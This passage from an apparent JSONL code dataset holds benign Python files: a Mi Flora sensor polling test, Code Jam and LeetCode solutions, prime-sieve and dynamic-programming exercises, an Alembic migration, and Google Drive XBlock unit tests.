enumerate(res):\n print(k)\n\n\nif __name__ == '__main__':\n fun()\n","repo_name":"huomozhihen/steelAnalysis","sub_path":"SteelDemandAnalysis/model/ARIMA/x13_steelDemand_predict.py","file_name":"x13_steelDemand_predict.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71766804675","text":"# coding=utf-8\nimport argparse\nimport logging\nimport sys\n\nimport re\nfrom btlewrap import BluepyBackend\nfrom miflora import miflora_scanner\nfrom miflora.miflora_poller import MI_BATTERY\nfrom miflora.miflora_poller import MI_CONDUCTIVITY\nfrom miflora.miflora_poller import MI_LIGHT\nfrom miflora.miflora_poller import MI_MOISTURE\nfrom miflora.miflora_poller import MI_TEMPERATURE\nfrom miflora.miflora_poller import MiFloraPoller\n\nlogger = logging.getLogger(\"mycodo.inputs.miflora\")\n\n\ndef poll(args):\n \"\"\"Poll data from the sensor.\"\"\"\n poller = MiFloraPoller(args.mac, BluepyBackend)\n print(\"Getting data from Mi Flora\")\n print(\"FW: {}\".format(poller.firmware_version()))\n print(\"Name: {}\".format(poller.name()))\n print(\"Temperature: {}\".format(poller.parameter_value(MI_TEMPERATURE)))\n print(\"Moisture: {}\".format(poller.parameter_value(MI_MOISTURE)))\n print(\"Light: {}\".format(poller.parameter_value(MI_LIGHT)))\n print(\"Conductivity: {}\".format(poller.parameter_value(MI_CONDUCTIVITY)))\n print(\"Battery: {}\".format(poller.parameter_value(MI_BATTERY)))\n\ndef scan(args):\n \"\"\"Scan for sensors.\"\"\"\n print('Scanning for 10 seconds...')\n devices = miflora_scanner.scan(BluepyBackend, 10)\n print('Found {} devices:'.format(len(devices)))\n for device in devices:\n print(' {}'.format(device))\n\ndef valid_miflora_mac(mac, pat=re.compile(r\"C4:7C:8D:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}\")):\n \"\"\"Check for valid mac addresses.\"\"\"\n if not pat.match(mac.upper()):\n raise argparse.ArgumentTypeError('The MAC address \"{}\" seems to be in the wrong format'.format(mac))\n return mac\n\ndef main():\n \"\"\"Main function. Mostly parsing the command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--verbose', action='store_const', const=True)\n subparsers = parser.add_subparsers(help='sub-command help', )\n\n parser_poll = subparsers.add_parser('poll', help='poll data from a sensor')\n parser_poll.add_argument('mac', type=valid_miflora_mac)\n parser_poll.set_defaults(func=poll)\n\n parser_scan = subparsers.add_parser('scan', help='scan for devices')\n parser_scan.set_defaults(func=scan)\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n\n if not hasattr(args, \"func\"):\n parser.print_help()\n sys.exit(0)\n\n args.func(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/tests/manual_tests/test_miflora.py","file_name":"test_miflora.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"}
+{"seq_id":"23600670921","text":"import string\r\n\r\nifile = open(\"A-large.in\")\r\ns = ifile.read().split(\"\\n\")\r\nifile.close()\r\n\r\nT = int(s[0])\r\n\r\nout = []\r\nfor i in range(1,T+1):\r\n N = int(s[i].split(\" \")[0])\r\n K = int(s[i].split(\" \")[1])\r\n\r\n if (K+1)%pow(2,N)==0:\r\n O = \"ON\"\r\n else:\r\n O = \"OFF\"\r\n \r\n out.append(\"Case #\"+str(i)+\": \"+O)\r\n\r\nofile = open(\"output.txt\",\"w\")\r\nofile.write(string.join(out,\"\\n\"))\r\nofile.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/372.py","file_name":"372.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13694807792","text":"from functools import cmp_to_key\nclass Solution:\n def largestNumber(self, nums: List[int]) -> str:\n def cmp(x, y):\n a, b = int(x+y), int(y+x)\n if a < b:\n return 1\n elif a > b:\n return -1\n else:\n return 0\n\n nums = sorted(map(str, nums), key=cmp_to_key(cmp))\n ans = ''.join(nums).lstrip('0')\n\n return ans if ans else '0'","repo_name":"pdkz/leetcode","sub_path":"0179_Largest_Number/0179_Largest_Number.py","file_name":"0179_Largest_Number.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23622774651","text":"def explode(s, c):\r\n t = []\r\n s += c;\r\n p = 0;\r\n for i in range(len(s)):\r\n if (s[i] == c or s[i] == \"\\n\") and s[p:i] != \"\" and s[p:i] != \"\\n\":\r\n t.append(s[p:i])\r\n p = i + 1\r\n return t\r\n\r\ndef isSorted(a):\r\n for i in range(1, len(a)):\r\n if a[i] < a[i-1]: return False\r\n return True\r\n\r\ndef findChain(aU, aS, dest, i):\r\n nextIndex = aS.index(aU[i])\r\n if dest == nextIndex: return [dest]\r\n return [nextIndex] + findChain(aU, aS, dest, nextIndex)\r\n\r\ndef rotateChain(aU, aS, dest, i):\r\n nextIndex = aS.index(aU[i])\r\n aU[i] = aS[i]\r\n if dest == nextIndex: return\r\n rotateChain(aU, aS, dest, nextIndex)\r\n\r\ndef solveCase(data):\r\n aU = explode(data, \" \")\r\n for i in range(len(aU)):\r\n aU[i] = int(aU[i])\r\n aS = []\r\n for i in aU: aS.append(i)\r\n aS.sort()\r\n i = -1\r\n n = len(aS)\r\n count = 0\r\n\r\n while i < n-1:\r\n i += 1\r\n if aU[i] == aS[i]: continue\r\n chain = findChain(aU, aS, i, i)\r\n rotateChain(aU, aS, i, i)\r\n if len(chain) > 1: count += len(chain)\r\n return \"%0.6f\" % count\r\n\r\ndef process(data):\r\n out = \"\"\r\n caseNum = 1\r\n for i in range(2, len(data), 2):\r\n if caseNum > 1: out += '\\n'\r\n out += \"Case #\" + str(caseNum) + \": \"\r\n out += solveCase(data[i])\r\n caseNum += 1\r\n return out\r\n\r\ndef main(fn):\r\n iFile = open(fn + \".in\", \"r\")\r\n oFile = open(fn + \".out\", \"w\")\r\n print(\"Files opened.\")\r\n\r\n data = []\r\n while True:\r\n line = iFile.readline()\r\n if not line: break\r\n data.append(line)\r\n\r\n out = process(data)\r\n print(\"Calculations complete. Outputting to file.\")\r\n oFile.writelines(out)\r\n print(\"Output complete.\")\r\n iFile.close()\r\n oFile.close()\r\n print(\"Files closed.\")\r\n\r\nmain(\"small\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_77/313.py","file_name":"313.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31376906781","text":"\"\"\"\nhttps://youtu.be/cswJ1h-How0\n# 9. 코딩테스트에서 자주 출제되는 기타 알고리즘.\n\n\"\"\"\nimport math\n\n\n# 복잡도: O(x)\ndef is_prime_number_old(x):\n for i in range(2, x):\n if x % i == 0:\n return False\n return True\n\n\n# 복잡도: O(sqrt(x))\ndef is_prime_number(x):\n for i in range(2, int(math.sqrt(x) + 1)):\n if x % i == 0:\n return False\n return True\n\n\n# 에라토스테라스의 체\ndef eratosteras(x):\n array = [True for i in range(x + 1)] # 1~x 소수 초기화.\n for i in range(2, int(math.sqrt(x) + 1)):\n if array[i] == True: # i 가 소수인경우.\n j = 2\n while i * j <= x: # i 배수는 모두 False처리.\n array[i * j] = False\n j += 1\n list = [] # 소수 idx 리스트.\n for idx in range(2, x + 1):\n if array[idx]:\n list.append(idx)\n return list\n","repo_name":"moneymashi/ThisIsCodeTestInPYTHON","sub_path":"FreqAskCodeTest/PrimeNumber.py","file_name":"PrimeNumber.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25476351438","text":"'''\n[Graduate Algorithm @galTech/ Ud401]\nweb page: https://gt-algorithms.com/\nContent: 1.DP: FIB, LIS, LCS\nAuthor: Rebecca\n'''\n\n#buttom-up DP version of fib\ndef fib(n):\n\td = [0,1]\n\tfor i in range(2,n):\n\t\td.append(d[i-1] + d[i-2])\n\treturn d[n-1]\n\n# ------------ simple test -------------\nprint(fib(2))\nprint(fib(10))\n# --------------------------------------\n\n\n#Longest Increasing Subsequence(LIS)\n# definition of Subsequence -- allow skip elements\ndef LIS(a:list):\n\tn = len(a)\n\tmax_l = 1\n\tlis = [1]*n\n\tfor i in range(1,n):\n\t\tfor j in range(0,i):\n\t\t\tif a[i]>a[j] and lis[i]< lis[j]+1:\n\t\t\t\tlis[i] = lis[j]+1\n\t\tif max_l0 and mat[0][j-1]>0):\n\t\t\tmat[0][j] = 1\n\t\t\t\n\tfor i in range(m):\n\t\tif a[i]==b[0] or (i>0 and mat[i-1][0]>0):\n\t\t\tmat[i][0] = 1\n\n\tfor i in range(1,m):\n\t\tfor j in range(1,n):\n\t\t\tif a[i]==b[j]:\n\t\t\t\tmat[i][j] = mat[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\tmat[i][j] = max(mat[i-1][j],mat[i][j-1])\n\t#print(mat)\n\treturn mat[m-1][n-1]#, mat\n\n# ------------ simple test -------------\na,b = 'bbb', 'bb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'bbb', 'bbbb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'Rebecca', 'bbba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\na,b = 'abba', 'aba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS(a,b)))\n\n# --------------------------------------\n\n\n#LCS: longest common subsequence\n# space optimization: O(min(n,m))\ndef LCS_opt(a,b):\n\tm,n = len(a), len(b)\n\tif(m==0 or n==0):\n\t\treturn 0\n\tif(m0 and prev[j-1]>0):\n\t\t\tprev[j] = 1\n\tfor i in range(m):\n\t\tif a[i] == b[0] or prev[0]>0:\n\t\t\tcurr[0] = 1\n\t\tfor j in range(1,n):\n\t\t\tif a[i]==b[j]:\n\t\t\t\tcurr[j] = prev[j-1]+1\n\t\t\telse:\n\t\t\t\tcurr[j] = max(curr[j-1],prev[j])\n\t\tprev = curr\n\t\tcurr = [0]*n\n\treturn prev[-1]\n\n# ------------ simple test -------------\na,b = 'bbb', 'bb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'bbb', 'bbbb' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'Rebecca', 'bbba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\na,b = 'abba', 'aba' \nprint('The LCS of {} and {}: {}'.format(a,b,LCS_opt(a,b)))\n\n# --------------------------------------","repo_name":"LeafyQ/Algorithm","sub_path":"Intro2GA/DP1.py","file_name":"DP1.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32700483564","text":"\"\"\"empty message\n\nRevision ID: 85646d10e7cd\nRevises: dbf33c92fd33\nCreate Date: 2020-12-13 19:30:36.072250\n\n\"\"\"\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = '85646d10e7cd'\ndown_revision = 'dbf33c92fd33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute(\n 'ALTER TABLE direct_chat '\n 'RENAME CONSTRAINT fk_private_chat_chat_id '\n 'TO fk_direct_chat_chat_id'\n )\n\n\ndef downgrade():\n op.execute(\n 'ALTER TABLE direct_chat '\n 'RENAME CONSTRAINT fk_direct_chat_chat_id '\n 'TO fk_private_chat_chat_id'\n )\n","repo_name":"Kamide/citychat","sub_path":"server/migrations/versions/85646d10e7cd_.py","file_name":"85646d10e7cd_.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16577476286","text":"import json\n\nfrom webob import Request\nfrom mock import Mock\n\nfrom workbench.runtime import WorkbenchRuntime\nfrom xblock.runtime import KvsFieldData, DictKeyValueStore\n\nfrom google_drive import GoogleDocumentBlock, GoogleCalendarBlock\n\nfrom nose.tools import (\n assert_equals\n)\n\ndef make_request(body, method='POST'):\n request = Request.blank('/')\n request.method = 'POST'\n request.body = body.encode('utf-8')\n request.method = method\n return request\n\ndef make_document_block():\n runtime = WorkbenchRuntime()\n key_store = DictKeyValueStore()\n db_model = KvsFieldData(key_store)\n return GoogleDocumentBlock(runtime, db_model, Mock())\n\ndef make_calendar_block():\n runtime = WorkbenchRuntime()\n key_store = DictKeyValueStore()\n db_model = KvsFieldData(key_store)\n return GoogleCalendarBlock(runtime, db_model, Mock())\n\ndef test_studio_document_submit():\n block = make_document_block()\n\n body = json.dumps({\n 'display_name': \"Google Document\",\n 'embed_code': \"